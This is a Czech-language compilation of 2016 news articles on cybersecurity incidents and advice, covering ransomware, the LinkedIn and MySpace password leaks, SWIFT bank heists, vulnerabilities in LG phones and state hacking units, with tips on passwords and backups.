„Pořádkumilovní Němci nedávno našli v informačních systémech jaderné elektrárny dva viry, které tam podle všeho nenápadně šmírovaly několik let. Jeden z těch virů byl nejaktivnější v roce 2008 a v elektrárně ho našli až nyní. Komu posílal informace a jaké? Jediné, co se ví, je, že aktivně odesílal informace. Někam,“ popisuje Špidla.

Stále častější jsou i útoky na systémy, které řídí nejrůznější technologie v průmyslu. „Před časem hackeři napadli v Německu systémy pro řízení vysoké pece. Stala se neřiditelná a musela být odstavena,“ poukazuje Špidla na další případ.

Kybernetický útok může snadno rozkolísat společnost, znevěrohodnit vládní instituce. „Stačí na několik týdnů zablokovat systém pro výplatu sociálních dávek. Nejcitlivější je ovšem energetika, plynovody, vodárenství, informační systémy. Do kritické infrastruktury se nejspíše brzy zahrnou zdravotnická zařízení. Budou muset přijímat nová bezpečnostní opatření,“ řekl Špidla.

Na nemocnice s milióny citlivých údajů si brousí zuby i organizovaný zločin. „Nedávno hackeři zablokovali databázi pacientů v nemocnici v USA. Chtěli výpalné a nemocnice ho zaplatila,“ připomíná americký právník a partner české PwC Legal Michael Mullen.

Semeništěm hackerů ovšem podle Špidly i Mullena bývají státy sponzorované skupiny.

„V Číně je jedna celá vojenská divize, která se věnuje kybernetickému boji, špionáži. I s podpůrnými jednotkami, ať už oficiálními nebo neoficiálními, se jedná asi o padesát tisíc lidí. O Rusku se říká, že jen někde ve Voroněži sedí kolem dvanácti tisíc odborníků, kteří provádějí hackerské aktivity pro stát. Stopy závažných událostí, jako jsou kybernetické útoky v Gruzii a Estonsku, vedou do Ruska,“ shrnuje Špidla. Na hackerských fórech si podle něj bez ruštiny skoro neškrtnete.

Izraelci pomáhají vycvičit Čechy
Hackeři přesměrovali například tok plynu v plynovodu z Ázerbájdžánu tak, aby šel přes Rusko. Čtrnáct dní trvalo, než se to podařilo vrátit zpátky.

„Než začne opravdová válka, je výhodné vyvolat chaos. Několik týdnů před konfliktem v Gruzii měl prezident totálně zmatené webové stránky, selhávaly informační a komunikační systémy státní správy. Do takovéhoto chaosu není těžké vjet s tanky,“ vysvětluje Špidla.

Potíž při hledání lidí na kyberochranu státu je loajalita. „Dobré to mají v Izraeli, kde se lidé znají z armády a nemají problém v případě potřeby pracovat pro oficiální struktury. Je velmi dobře, že Česko uzavřelo s Izraelem smlouvu o sdílení informací, týkající se kybernetické bezpečnosti. Jsou vycvičeni neustálým bojem,“ tvrdí Špidla.

Izraelci se podle něj podíleli na vzniku kybernetického výcvikového centra CyberGym v Řitce u Prahy. Zde se cvičí policisté v nedávno ustanoveném týmu proti kybernetické kriminalitě.

„Naše policie disponuje kvalitními odborníky, ale je jich málo. Je problém sehnat počítačové specialisty do těchto složek. Soukromá sféra tyto specialisty platí úplně jinak. Odborníků na počítačovou bezpečnost je ale celosvětově málo. Například FBI má na to speciální program: hackerům předkládá velmi zajímavé nabídky, aby je přemluvil ke spolupráci,“ uvedl Špidla.


Mobily od LG mají nebezpečné trhliny. Útočníci mohou měnit SMS zprávy

27.7.2016  Mobilní
Dvě nebezpečné trhliny byly odhaleny v chytrých telefonech od společnosti LG. Útočníci je mohli zneužít k tomu, aby měnili znění doručených SMS zpráv, nebo na dálku převzali kontrolu nad napadeným přístrojem. Na zranitelnosti upozornili bezpečnostní analytici ze společnosti Check Point.
Jak bránit PC a mobily proti hackerům?

Počítačoví piráti neustále hledají nové cesty, jak se lidem dostat do počítače. Propašovat škodlivé kódy se přitom stále častěji snaží také do mobilů a tabletů.
Do mobilních zařízení se snaží kyberzločinci dostat prakticky stejným způsobem jako do klasických počítačů. Hledají chyby v nejrůznějších aplikacích a operačních systémech, které by jim dovolily propašovat záškodníka na cizí přístroj.
Hackeři také spoléhají na to, že uživatelé rizika podceňují. Na klasických počítačích provozuje antivirový program prakticky každý, u mobilů a tabletů tomu tak ale není. Počítačovým pirátům tak nic nestojí v cestě.
pondělí 6. června 2016, 12:02
Chyby se týkají výhradně telefonů od LG s operačním systémem Android. Patrně jsou tedy obsaženy v nějakém doplňkovém softwaru, který tento výrobce do svých přístrojů instaluje.

„První zranitelnost umožňuje škodlivé aplikaci nainstalované na LG zařízení zneužít přístup k oprávněním, zvýšit práva útočníků a získat větší kontrolu nad zařízením,“ varoval David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj představuje velké riziko také druhá objevená zranitelnost. „Ta umožňuje vzdálenému útočníkovi smazat nebo upravit přijaté SMS zprávy na zařízení. Tento postup by mohl být zneužit například jako součást phishingového útoku a krádežím přihlašovacích údajů nebo k instalaci škodlivých aplikací,“ doplnil Řeháček.

Bezpečnostní experti nicméně upozornili na obě zranitelnosti společnost LG ještě před jejich odhalením. V současnosti jsou tak pro chyby již k dispozici záplaty, které lidé mohou ve svých mobilních přístrojích stahovat prostřednictvím automatických aktualizací systému.

S ohledem na možná rizika by uživatelé s instalací rozhodně neměli otálet.

Škodlivých kódů pro mobily přibývá
V posledních měsících se zaměřují počítačoví piráti na mobilní zařízení stále častěji. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček.

Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad. 

HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.


Vyděračských webů s ransomwarem přibývá, za první čtvrtletí o 3500 procent

27.7.2016  Viry
Závratný nárůst počtu nebezpečných internetových stránek, v nichž se skrývá vyděračský vir ransomware, který zašifruje obsah počítače, a jeho tvůrce žádá po uživateli výkupné, zaznamenala americká bezpečnostní společnost Infoblox.
Z jejího pravidelného výzkumu Threat Infoblox DNS Index vyplývá, že jen za první čtvrtletí letošního roku vzrostl počet internetových domén zneužitých ransomwarem oproti poslednímu kvartálu 2015 o rekordních 3500 procent. Útočníci se přitom začali stále více zaměřovat na firmy, u kterých vytušili větší šanci získat výkupné.

Neplaťte útočníkům výkupné, motivuje je to k dalším útokům.
Petr Šnajdr, bezpečnostní expert společnosti ESET
„Došlo k seismickému nárůstu hrozeb ransomwaru, které se posouvají od běžných uživatelů internetu, od nichž útočníci mohou získat výkupné v řádu několika dolarů, k firmám všech velikostí, včetně těch největších. Náš index hrozeb ukazuje, že kyber zločinci chtějí ve velkém měřítku využít právě této příležitosti,“ říká viceprezident společnosti Infoblox Rod Rasmussen.

Útoky ransomwaru se nesoustředí pouze na počítače nebo notebooky. Antivirová společnost ESET již začátkem letošního roku upozornila na výrazný nárůst případů ransomware útoků na mobilní zařízení s operačním systémem Android. Hrozba se nevyhýbá ani zařízením společnosti Apple s operačním systémem iOS X.

Jakmile je zařízení infikováno ransomwarem, nemá uživatel prakticky žádnou šanci je odblokovat. Za klíč, který by je odšifroval, musí útočníkům zaplatit. Neexistuje však žádná záruka, že po zaplacení budou zablokované soubory nebo celé zařízení opravdu dešifrovány. Bezpečnostní experti se proto shodují, že útočníkům by se výkupné platit nemělo.

„Motivuje je to k dalším útokům. Pokud by jim lidé neplatili a řádně si zálohovali data, útočníci by ztratili potřebu šířit ransomware,“ vysvětluje Petr Šnajdr, bezpečnostní expert společnosti ESET. Externí disk pro zálohu dat však nesmí být dlouhodobě připojen k zařízení, jehož prostřednictvím se uživatel připojuje k internetu, jinak by mohly být zálohované soubory rovněž zašifrovány.

Lidé by neměli bezhlavě otevírat přílohy
Ransomware se často šíří formou příloh nevyžádaných e-mailů nebo využívá chyb v programech Adobe Flash či Java. Stačí tedy, aby uživatel navštívil stránku s infikovanou reklamou ve Flashi a neměl tento program aktualizovaný, a bude přesměrován na web, z něhož se mu do zařízení stáhne a instaluje ransomware.

„Lidé by neměli bezhlavě otevírat přílohy e-mailů, které je vyzývají k platbě údajných pohledávek, ani klikat na podezřelé odkazy na internetových stránkách. Zejména ve firmách by zaměstnanci měli pravidelně podstupovat bezpečnostní školení, protože riziko, že útočník pronikne do firemní sítě, a firma přijde o velké množství citlivých dat, je opravdu veliké,“ upozorňuje Petr Šnajdr.

Nejvíce škodlivých webů s ransomwarem se podle výzkumu Threat Infoblox DNS Index aktuálně objevuje ve Spojených státech (41 procent). Následuje Portugalsko (17 procent), Rusko (12 procent), Nizozemí (10 procent), Velká Británie (8 procent) a Island (6 procent).


Tvůrce bankovního viru Gozi odsouzen k pokutě sedm miliónů dolarů

27.7.2016  Viry
Téměř sedm miliónů dolarů (175 miliónů korun) má zaplatit hacker Nikita Kuzmin, který v roce 2007 vytvořil a použil jeden z prvních bankovních počítačových virů Gozi zaměřených na prolamování bankovních účtů.
Rozhodl o tom soud v New Yorku, který už dříve Kuzminovi uložil trest 37 měsíců veřejně prospěšných prací. Mladík, který pochází z Ruska, byl dopaden v roce 2011 a ke svým činům se doznal.

Škodlivý kód Gozi napadl milióny počítačů po celém světě a způsobil škody ve výši několika desítek miliónů dolarů. Ve své době si s ním neuměly poradit ani antivirové programy.

Kromě toho Kuzmin jako jeden z prvních kyberzločinců začal své služby a vybudovanou infrastrukturu pronajímat dalším hackerům. Účtoval si za to poplatek 500 dolarů týdně (téměř 13 tisíc korun) v digitální měně WebMoney. Zprostředkovával tak krádeže dat i finančních prostředků dalším kriminálníkům.

Díky dvoufaktorové autentizaci je pro hackery mnohem těžší kompromitovat bankovní účty.
Martin Skýpala, produktový specialista společnosti ESET
Nikita Kuzmin svým „klientům“ nabízel přístup ke konkrétním bankovním ústavům a umožňoval jim provádět kybernetické útoky. Na těchto aktivitách vydělal nejméně 250 tisíc dolarů (přes šest miliónů korun). Po dopadení u něj vyšetřovatelé zajistili počítač se záznamy o 10 tisících prolomených bankovních účtech od 5200 uživatelů počítačů včetně přihlašovacích údajů do více než 300 bank po celém světě.

V Kuzminově případu je obviněn i rumunský hacker Mihai Ionut Paunescu, který mu poskytoval „neprůstřelný“ hosting a čeká se na jeho vydání do Spojených států.

„Díky plošnému zavedení dvoufaktorové autentizace do internetového bankovnictví je pro hackery mnohem těžší kompromitovat bankovní účty než dříve. Pokud se jim však povede infikovat počítač a pomocí technik sociálního inženýrství i mobilní zařízení uživatele, je cesta volná,“ říká Martin Skýpala, produktový specialista společnosti ESET.

Proto je velmi důležité používat pravidelně aktualizované bezpečnostní řešení a veškerou komunikaci s bankou (e-mail, internet) pečlivě ověřovat.


Olympiáda nahrává počítačovým pirátům

27.7.2016  Zdroj:
Už za dva měsíce odstartují letní olympijské hry v Riu de Janeiru. Právě nedočkaví sportovní fanoušci by se ale měli mít na pozoru, protože na ně na internetu v poslední době líčí pasti počítačoví piráti. Snaží se tak vylákat citlivé údaje i propašovat škodlivé kódy do cizích počítačů.
Na rostoucí riziko kybernetických útoků v souvislosti s hrami v Riu upozornili bezpečnostní experti z antivirové společnosti Kaspersky Lab. Ti zachytili první nevyžádané e-maily už v minulém roce, v posledních týdnech ale počet rozeslaných spamů stoupá.

Nejčastěji se kyberzločinci snaží důvěřivce nalákat na výhru vstupenek v soutěži, kterou organizovaly Mezinárodní olympijský výbor a brazilská vláda. Tvrdí, že právě jejich e-mail byl náhodně vybrán z obřího seznamu účastníků.

Ve spamové zprávě se nachází odkaz na formulář, který je nutné k převzetí „ceny“ vyplnit. Pokud to uživatelé skutečně udělají, nevědomky tak poskytnou počítačovým pirátům všechny citlivé údaje.

Podezřele levné vstupenky
Ještě větší riziko nicméně představují nejrůznější podvodné weby, které nabízejí vstupenky na olympiádu za podezřele nízkou cenu. Na nich totiž podvodníci vyzývají uživatele, aby v informacích o objednávce vyplnili také údaje o své platební kartě.

Tím pochopitelně dají kyberzločincům do rukou vše, co potřebují, aby mohli lidem vybílit bankovní účet.

Počítačoví piráti jsou dokonce tak vynalézaví, že objednávku potvrdí své oběti do e-mailu s tím, že samotné lístky dorazí za dva až tři týdny. Uživatelé tak mohou nabýt falešného pocitu bezpečí, ve skutečnosti ale nechají podvodníkům dostatek času, aby mohli účet vybílit.

Před weby nabízejícími až podezřele levné vstupenky a před nevyžádanými zprávami týkajícími se olympijských her by se tedy měli mít uživatelé na pozoru.


V Rusku zadrželi desítky hackerů, měli ukrást přes 600 miliónů

27.7.2016  Zákony
V Rusku bylo za počítačovou kriminalitu zatčeno 50 lidí, kteří jsou podezřelí, že s pomocí nezákonných počítačových operací ukradli 1,7 miliardy rublů (615 miliónů Kč). Informovala o tom agentura Interfax. Podle ní se zátahů na členy gangu na 80 místech v 15 oblastech Ruska podílelo ministerstvo vnitra a Federální bezpečnostní služba (FSB).
Osmnácti zadrženým bylo zamítnuto propuštění na kauci, další tři byli umístěni do domácího vězení. Všichni byli obviněni z vytvoření, šíření a používání nezákonných počítačových programů.

Policie zabavila počítače a komunikační zařízení, bankovní karty, finanční dokumenty a velké sumy peněz. Podle Interfaxu vyšetřování ještě pokračuje.

FSB oznámila, že zadržené osoby kradly peníze z ruských finančních institucí.


Největší hackerský útok potvrzen. V ohrožení jsou stovky miliónů uživatelů

27.7.2016  Hacking
Víc než 400 miliónů hesel, která se od pondělí nabízela na internetovém černém trhu, jsou podle všeho pravá. Ve středu to potvrdili zástupci sociální sítě MySpace, ze které mají odcizená data pocházet. Upozornil na to server The Hacker Hews. Přestože MySpace dnes již nepatří mezi ty nejpopulárnější, nebezpečí spočívá v tom, že řada uživatelů používá stejné přístupové údaje i k dalším službám.
Útok na MySpace se měl konat už v roce 2013. Že se hackerovi nebo neznámé skupince hackerů podařilo odcizit stovky miliónů přístupových údajů, se však ukázalo až tento týden.

Hacker vystupující pod přezdívkou Peace totiž obrovský balík přihlašovacích údajů nabídl k prodeji na černém trhu. Požadoval za ně šest bitcoinů, tedy v přepočtu za bezmála 70 tisíc korun. Zmiňovanou virtuální měnu nezvolil hacker náhodou – nelze ji totiž snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.

Účty mohou být kompromitovány.
„Jsme přesvědčeni, že nejde o podvrh a že v roce 2013 nebo někdy dříve skutečně došlo k narušení bezpečnosti. Účty z tohoto roku a starší tedy mohou být kompromitovány,“ varovali zástupci sociální sítě.

V současnosti server MySpace používá jen několik desítek miliónů uživatelů, před lety však byla její popularita daleko větší. Zástupci sociální sítě se chlubí tím, že má miliardu registrovaných uživatelů.

A právě to představuje podle bezpečnostních expertů velký problém. V ohrožení jsou totiž i uživatelé, kteří svůj účet již dávno nepoužívají. Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.

Databáze s přihlašovacími údaji tak může představovat pro uživatele potenciální riziko i přesto, že útok proběhl před třemi lety.

Nejde o ojedinělý útok
V celé historii internetu není zaznamenán případ, kdy by se podařilo jedinému hackerovi nebo skupince počítačových pirátů odcizit tak velké množství hesel, než nyní v případě sociální sítě MySpace.

Na internetovém černém trhu se sice nabízely ještě větší balíky hesel, vždy se však nakonec ukázalo, že jde o podvrh.

V posledních týdnech jde už o třetí velký únik hesel, na který se přišlo. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn, pak 65 miliónů přihlašovacích údajů ze sítě Tumblr. 

Pozor na jednoduchá hesla
Únik dat ze sítě MySpace jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla, ale alespoň jednou za pár měsíců je pravidelně měnit.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.


Zaznamenali jsme desítky hackerských útoků, přiznala americká centrální banka

27.7.2016  Hacking
Více než pět desítek případů narušení kybernetické bezpečnosti řešili v uplynulých letech bezpečnostní experti americké centrální banky (Fed). Podle interního vyšetřování za nimi stáli hackeři či zpravodajci. Upozornila na to agentura Reuters.
Všechny útoky jsou popsány v dokumentu, který si agentura Reuters vyžádala na základě zákona o svobodném přístupu k informacím. Zástupci Fedu však jednotlivé případy oficiálně nechtěli komentovat.

Ze zveřejněných dat tak bohužel není jasné, zda se během útoků podařilo hackerům či zpravodajcům odcizit nějaké peníze či citlivé údaje jednotlivých klientů. Jisté je nicméně to, že útočníci dokázali zabezpečení banky překonat a dostat se do jejích systémů. Jinými slovy – minimálně v případě zpravodajců – mohlo jít o špionáž.

Všechny útoky se měly odehrát mezi lety 2011 a 2015, zástupci banky o nich informovali až nyní v dokumentu připraveném pro agenturu Reuters.

Ve hře jsou stovky miliónů
Zprávy o kybernetických útocích na Fed přicházejí jen pár týdnů poté, co se ukázalo, že zatím neznámí hackeři připravili banky o stovky miliónů korun.

Například z účtu bangladéšské centrální banky, který je vedený právě u Fedu, zmizelo loni 81 miliónů dolarů, tedy v přepočtu více než 1,9 miliardy korun.

Ekvádorská banka Banco del Austro (BDA) pak v květnu uvedla, že měla během útoku přijít o 12 miliónů dolarů (bezmála 290 miliónů korun). 

K penězům se dostali snadno
K penězům se přitom počítačoví piráti dostali v obou případech až neuvěřitelně snadno, způsob provedení byl při obou útocích do posledního puntíku stejný. Nejprve do počítačů v bance propašovali viry, díky kterým získali přístupové kódy do SWIFT systému.

Ve virtuálním světě jedniček a nul je to stejné jako získat klíče od bankovního trezoru. SWIFT systém totiž jednotlivé banky využívají jako bezpečnostní standard k ověřování transferů mezi sebou. Pomocí něj jsou schopny získat jakési podpisové klíče, na základě kterých se pak identifikuje jedna finanční instituce před druhou klidně i na druhém konci planety. Zjednodušeně řečeno, banky se takto při komunikaci poznají.

A právě toho využili kyberzločinci. Po získání kódů do SWIFT systému začali pomalu provádět jednu platbu za druhou. Aby nebyla jejich činnost příliš nápadná, převáděli jen něco málo přes milión dolarů denně. Tak si jejich práce nevšimli zaměstnanci banky několik dní.

Ani při jednom ze zmiňovaných útoků se nepodařilo počítačové piráty vypátrat.


Clintonová používáním soukromého mailu porušila vládní pravidla

27.7.2016  Zabezpečení
Hillary Clintonová porušila vládní pravidla, když jako někdejší šéfka americké diplomacie používala pro pracovní účely svůj soukromý e-mail. Oznámila to inspekce ministerstva zahraničí, uvedla agentura Reuters. Zpráva inspekce, která je vůbec prvním zveřejněným oficiálním auditem, kritizuje nejen Clintonovou, ale i ministerstvo za dřívější nedostatky v uchovávání záznamů. Případem se kvůli možnému neoprávněnému využívání soukromého e-mailu zabývá i Federální úřad pro vyšetřování (FBI).
Inspekce zjistila, že pokud by tehdejší ministryně a nynější favoritka na demokratickou prezidentskou nominaci požádala na příslušném oddělení zabývajícím se elektronickou bezpečností o svolení používat soukromý e-mail, tak by ho nedostala. Zpráva také podkopává argumenty někdejší šéfky diplomacie, kterými hájí využívání soukromého poštovního serveru ve svém domě. Mimo jiné dříve uvedla, že to bylo běžnou praxí a že žádné svolení nepotřebovala, i tak se ale omluvila.

Ministerstvo zahraničí v reakci na zjištění kontroly uvedlo, že představitelé úřadu o soukromém e-mailu Clintonové používaném pro pracovní účely sice věděli, neznali ale plný rozsah jeho nasazení. Mluvčí ministerstva Mark Toner podle Reuters řekl, že úřad již vyhověl řadě doporučení, která inspekce ve zprávě učinila.

Clintonová podle vyšetřovatelů přes soukromý e-mail odeslala nebo přijala řadu tajných informací, přestože podle vládních nařízení podobnou poštu lze rozesílat jen přes bezpečnostně zajištěné kanály. Exministryně ale tvrdí, že její pošta žádná utajovaná data neobsahovala. V případu už byli vyslechnuti někteří její spolupracovníci, sama pak FBI přislíbila spolupráci.

Dávné problémy
Inspekce rovněž tvrdí, že ministerstvo zahraničí se potýkalo dávno před nástupem Clintonové s dlouhodobými a systémovými nedostatky s uchováváním dat. Úřad například nezachoval některou elektronickou korespondenci někdejších ministrů zahraničí. To ministerstvo uznává.

Předpokládaný republikánský prezidentský kandidát Donald Trump svou očekávanou demokratickou soupeřku v komentáři k auditu kritizoval.


Statisíce lidí používají na webu heslo 123456. Vystavují se riziku

27.7.2016  Zabezpečení
Bezpečnostní experti neustále uživatele varují, jak důležité je vytvářet k různým on-line službám důmyslná hesla, která kyberzločinci jen tak snadno neodhalí. Přesto si s touto problematikou příliš uživatelů hlavu neláme. Jak upozornil bezpečnostní výzkumník Brian Krebs, statisíce lidí stále používají primitivní heslo 123456.
Žebříček nejpoužívanějších hesel bezpečnostní výzkumníci sestavili z desítek miliónů přihlašovacích údajů, které unikly z profesní sítě LinkedIn. Útok se sice stal již v roce 2012, všechna odcizená hesla však byla zveřejněna až letos v květnu.

Absolutně nejpoužívanějším heslem je číselná kombinace 123456, kterou používalo 753 305 uživatelů služby LinkedIn. Je zřejmé, že po sobě jdoucích šest číslovek ale lidé používají i na jiných webech. V seznamu nejpoužívanějších hesel totiž vévodilo heslo 123456 už v nedávném žebříčku společnosti Splash Data.

Číselné kombinace jsou v módě
Z aktuálních dat z profesní sítě LinkedIn je nicméně patrné, že číselné kombinace jsou opravdu velmi populární. V různých kombinacích je totiž používají statisíce dalších lidí. Jak je vidět v tabulce níže, po sobě heslo složené pouze z číslovek se v žebříčku 15 nejpoužívanějších hesel objevilo hned několikrát.

Druhým nejrozšířenějším heslem se pak stalo slovo linkedin, tedy samotný název profesní sítě, ze které přihlašovací údaje unikly. Třetí příčka pak patří opět nepříliš originálnímu slovu password, což v překladu znamená jednoduše heslo.

Hesla nepodceňovat
Podceňovat hesla na internetu se přitom nemusí vyplatit. Zpravidla jsou totiž první linií účinné ochrany před odcizením citlivých osobních dat, například pro on-line bankovnictví nebo platby na internetu. S rozšířením notebooků, tabletů a chytrých telefonů navíc lidé provádějí peněžní transakce on-line stále častěji.

Navíc pokud takto jednoduché heslo používají lidé k zabezpečení svého e-mailu, snadno dají útočníkovi přístup k drtivé většině svých internetových služeb. Právě poštovní schránky se totiž využívají k případným obnovám hesla, pokud je zapomenete. A přesně takto může postupovat i počítačový pirát.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo), nebo pouhou posloupností číslic.

Nejpoužívanější hesla na internetu
1. 123456
2. linkedin
3. password
4. 123456789
5. 12345678
6. 111111
7. 1234567
8. sunshine
9. qwerty
10. 654321
11. 000000
12. password1
13. abc123
14. charlie
15. linked
Zdroj: Uniklá hesla ze služby LinkedIn/LeakedSource


Počítačoví piráti se omluvili za šíření vyděračského viru. Data je možné odemknout zadarmo

27.7.2016  Viry
Velmi netradiční zvrat nastal v případě počítačových pirátů, kteří šířili po internetu vyděračské viry. Ti se patrně nemohli už koukat na zkázu, kterou napáchal, a tak se jej rozhodli odstřihnout. Všem uživatelům se navíc omluvili. Upozornil na to server Bleeping Computer.
Jak se bránit proti vyděračským virům?

„Projekt končí, moc se všem omlouváme,“ uvedli neznámí kyberzločinci, kteří šířili po internetu vyděračský virus TeslaCrypt. Aby dokázali, že svou omluvu myslí skutečně vážně, připojili k ní také hlavní dešifrovací klíč. S jeho pomocí je možné zašifrovaná data odemknout i bez placení výkupného.

Sluší se však podotknout, že vyděračských virů existuje přinejmenším několik desítek různých druhů. Univerzální klíč přitom funguje pouze na již zmiňovaný TeslaCrypt.

Kyberzločinci se k nečekanému kroku podle všeho odhodlali díky jednomu bezpečnostnímu výzkumníkovi z antivirové společnosti Eset. Ten je anonymně kontaktoval přes oficiální kanál určený obětem vyděračského viru a požádal o zveřejnění univerzálního dešifrovacího klíče. Sám přitom patrně nečekal, že budou počítačoví piráti tak vstřícní.

Na základě toho vytvořili pracovníci Esetu dešifrovací nástroj, s jehož pomocí je možné uzamčená data na pevném disku snadno odemknout. Stahovat jej je možné zdarma zde.

Jak útočí vyděračské viry
Na napadeném stroji dokážou vyděračské viry udělat pěkný nepořádek. Nejprve zašifrují všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.

Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.

Zaplatit zpravidla chtějí v bitcoinech, protože pohyby této virtuální měny se prakticky nedají vystopovat. A tím logicky ani nelegální aktivita počítačových pirátů.

Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné. V případě škodlivého kódu TeslaCrypt to však už nyní neplatí.


Z banky ukradli hackeři stovky miliónů. Deset dní si jich nikdo nevšímal

27.7.2016 Kriminalita
Z amerických akčních filmových trháků by se dalo usuzovat, že velké banky patří k nejstřeženějším místům na této planetě a že si každý musí okamžitě všimnout byť jen jediného chybějícího dolaru. Opak je ale pravdou, jak dokazuje nově zmapovaný hackerský útok na ekvádorskou banku. Při něm si nikdo počítačových pirátů nevšímal dlouhých deset dní, díky čemuž si přišli na několik stovek miliónů korun.
Útok na banku Banco del Austro (BDA) se odehrál už v lednu 2015. Samotná banka o něm ale oficiálně informovala až nyní, v rámci žaloby se totiž domáhá ukradených stamiliónů zpět. Právě díky tomu se podařilo celý hackerský útok zmapovat, uvedla v pátek agentura Reuters.

Hackeři odcizili z BDA minimálně 12 miliónů dolarů, tedy v přepočtu bezmála 290 miliónů korun. K penězům se dostali až neuvěřitelně snadno. Nejprve do počítačů ve zmiňované finanční instituci propašovali viry, díky kterým získali přístupové kódy do SWIFT systému.

Je to stejné jako získat klíče od bankovního trezoru.
Ve virtuálním světě jedniček a nul je to stejné jako získat klíče od bankovního trezoru. SWIFT systém totiž jednotlivé banky využívají jako bezpečnostní standard k ověřování transferů mezi sebou. Pomocí něj jsou schopny získat jakési podpisové klíče, na základě kterých se pak identifikuje jedna finanční instituce před druhou klidně i na druhém konci planety. Zjednodušeně řečeno, banky se takto při komunikaci poznají.

A právě toho využili kyberzločinci. Po získání kódů do SWIFT systému začali pomalu provádět jednu platbu za druhou. Aby nebyla jejich činnost příliš nápadná, převáděli jen něco málo přes milión dolarů denně.

Patrně i kvůli tomu si pracovníci banky okamžitě nevšimli, že je něco v nepořádku. Jak upozornil server The Hacker News, zarazit neoprávněné transakce počítačovým pirátům se podařilo až po deseti dnech od prvního převodu. I to lze ale považovat za úspěch, protože v opačném případě by si hackeři odnesli ještě více.

Ukradené peníze chtějí zpět
Zástupci ekvádorské banky se však s tímto konstatováním patrně nechtějí smířit a své peníze požadují zpět. Protože se jim za více než rok nepodařilo peníze ani hackery vypátrat, chtějí své štěstí zkusit u soudu.

Zažalovali proto Wells Fargo – jednu z největších amerických bank. Právě z ní vylákali počítačoví piráti díky přístupu do SWIFT systému milióny dolarů, protože zde BDA má vedený účet. Zástupci BDA v žalobě tvrdí, že si „bankéři z Wells Fargo měli všimnout podezřelých transakcí“.

Wells Fargo však jakoukoliv vinu odmítá. V prohlášení pro agenturu Reuters v pátek zástupci americké banky prohlásili, že všechny „transakce byly provedeny podle pokynů přijatých přes ověřený SWIFT systém“.

Zatímco se banky dohadují, hackeři se mohou patrně radovat. Po měsících stopa vychladla a milióny dolarů byly postupně přeposílány a následně i vybrány přes banky v různých koutech světa.

Ztratilo se už 81 miliónů dolarů
Vše navíc nasvědčuje tomu, že se počítačové piráty nepodaří jen tak vypátrat. Podobným způsobem si totiž přišli také na 81 miliónů dolarů (1,9 miliardy Kč) z účtu bangladéšské centrální banky, vedeného u Federální rezervní banky (Fed) v New Yorku.

Při tomto útoku se také nabourali do SWIFT systému pomocí škodlivého kódu. Vyšetřování této velké bankovní loupeže letos v dubnu navíc ukázalo, že bankéři nepoužívali firewall. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.

Podle vyšetřovatelů bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.


LinkedIn narychlo mění hesla. Čtyři roky po útoku

27.7.2016  Zabezpečení
Desítky miliónů uživatelských jmen a hesel, která hacker nabízí k prodeji na internetu, jsou podle všeho pravá. Zástupci profesní sítě LinkedIn totiž začali uživatelům narychlo měnit hesla. A to i přesto, že se útok stal už před čtyřmi roky.
Jak postupovat při změně hesla na LinkedIn:

:: Navštivte web LinkedIn nebo běžte do mobilní aplikace.
:: Jste-li přihlášeni, odhlaste se.
:: Znovu se přihlaste a postupujte podle instrukcí ke změně hesla.
pátek 20. května 2016, 8:54
„V nedávné době jsme zaznamenali potenciální riziko pro váš účet na LinkedInu a přijali jsme okamžitá opatření na ochranu vašeho účtu. Při příštím přihlášení si budete muset změnit heslo,“ konstatovali zástupci sítě LinkedIn.

E-mail v tomto znění obdržely během čtvrtka a pátku milióny uživatelů zmiňované profesní sítě. Mezi ohroženými uživateli jsou i Češi.

Odcizená uživatelská data mají pocházet z útoku z roku 2012. Tehdy se však předpokládalo, že z LinkedInu uniklo méně než 6,5 miliónu hesel. Tento týden ve čtvrtek se však ukázalo, že jich je mnohem víc. 

Hacker chce 50 000 korun
Hacker vystupující pod přezdívkou Peace totiž na černém internetovém trhu začal prodávat databázi obsahující na 167 miliónů hesel. Požaduje za ni pět bitcoinů, tedy v přepočtu zhruba padesát tisíc korun.

Testy na vzorku uživatelských dat, která hacker nabízí jako ukázku, prokázaly, že odcizená hesla jsou pravá. Právě proto začali zástupci LinkedInu narychlo resetovat uživatelům hesla, přestože se útok udál už před čtyřmi lety.

